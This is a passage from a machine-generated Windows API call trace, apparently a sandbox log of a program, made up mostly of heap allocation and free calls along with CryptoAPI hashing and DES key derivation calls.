cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.443] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.443] CryptHashData (hHash=0xa872d0, pbData=0x2e54db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0152.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0152.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0152.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0152.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0152.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0152.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0152.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0152.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0152.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.448] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.449] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0152.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0152.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0152.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0152.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509e0 [0152.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.555] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa870d0) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0152.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0152.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0152.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0152.558] HeapFree (in: 